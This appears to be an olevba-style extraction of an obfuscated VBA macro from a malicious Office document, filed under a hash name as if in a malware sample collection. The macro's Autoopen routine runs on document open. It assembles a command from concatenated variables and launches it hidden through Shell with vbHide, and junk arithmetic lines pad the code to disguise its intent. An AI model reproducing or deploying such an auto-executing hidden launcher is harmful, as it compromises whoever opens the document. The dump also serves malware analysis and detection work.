Filename     : ./macros/a4ef269f3d42ba48a4937e147afea3e82a0d967f8685273090201bb868b165c9
OLE stream   : Macros/VBA/BFURziWmal
VBA filename : BFURziWmal.cls
----------------------------------------
Attribute VB_Name = "BFURziWmal"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dQllvDA()
On Error Resume Next
Set dlVBu = jbFdo
nwOTs = whusdZ + CSng(53803) + 49640 / Sin(86731 - CByte(69900) / 87185 - Round(20371)) + FEVCUN * dCiLY - (60825 + 22804 + 12098 - 3265)
Set QkKOkz = lHvZUY
ivtjwS = uFhSvw + CSng(66300) + 38923 / Sin(96145 - CByte(26422) / 41712 - Round(46381)) + TIAUVE * RMRmJd - (69042 + 56487 + 55708 - 72761)
dQllvDA = FWcHkww + pGjLuUQMKQs + YcJGpQ + plRlw + aNVRQUnU + opMliuKUGz + ShVzqiCOF + zGkGiqz + ViaCzZkS + JXdFzhB + UZmfbAzszl + LBqzibi + wCRAq + CIClqBHjN
Set HjBWid = oBwRJh
wbfZu = Nubdi + CSng(77289) + 89300 / Sin(18171 - CByte(34582) / 28459 - Round(9820)) + MkOovz * XZjCuz - (4893 + 69162 + 67534 - 24086)
End Function
Sub Autoopen()
On Error Resume Next
Set EDiMO = HXoqi
Wmrazw = HjhvXz + CSng(63991) + 84018 / Sin(63756 - CByte(57656) / 60669 - Round(8134)) + wPJBJ * WBhXJn - (77800 + 74667 + 19571 - 31979)
QsMpzXvcbz (dQllvDA)
Set ZEntE = XHKNh
atImX = GcpRwa + CSng(76450) + 49982 / Sin(17620 - CByte(45724) / 16718 - Round(67509)) + XbdEa * Rrumt - (96962 + 72855 + 78110 - 62319)
End Sub
Function QsMpzXvcbz(qZbTUw)
On Error Resume Next
Set iBARz = oOIGM
iMzwb = Kuwph + CSng(41088) + 11530 / Sin(95086 - CByte(23993) / 80520 - Round(91299)) + MlHSf * HSPTm - (29744 + 91148 + 39096 - 8442)
Set MhmvW = imKoTf
zqwSq = awMhdr + CSng(18210) + 71117 / Sin(82286 - CByte(13793) / 63841 - Round(88394)) + QukiC * vbHUH - (81737 + 6255 + 54353 - 13543)
QPVsZ = Shell(lijRb + Chr(vbKeyP) + pmpoSMNZn + qZbTUw, vbHide)
Set cowFa = MAAJEN
nfduF = QPMvS + CSng(89207) + 35722 / Sin(36263 - CByte(57364) / 8379 - Round(82121)) + OCVOS * omnijd - (86798 + 92948 + 66038 - 51329)
End Function

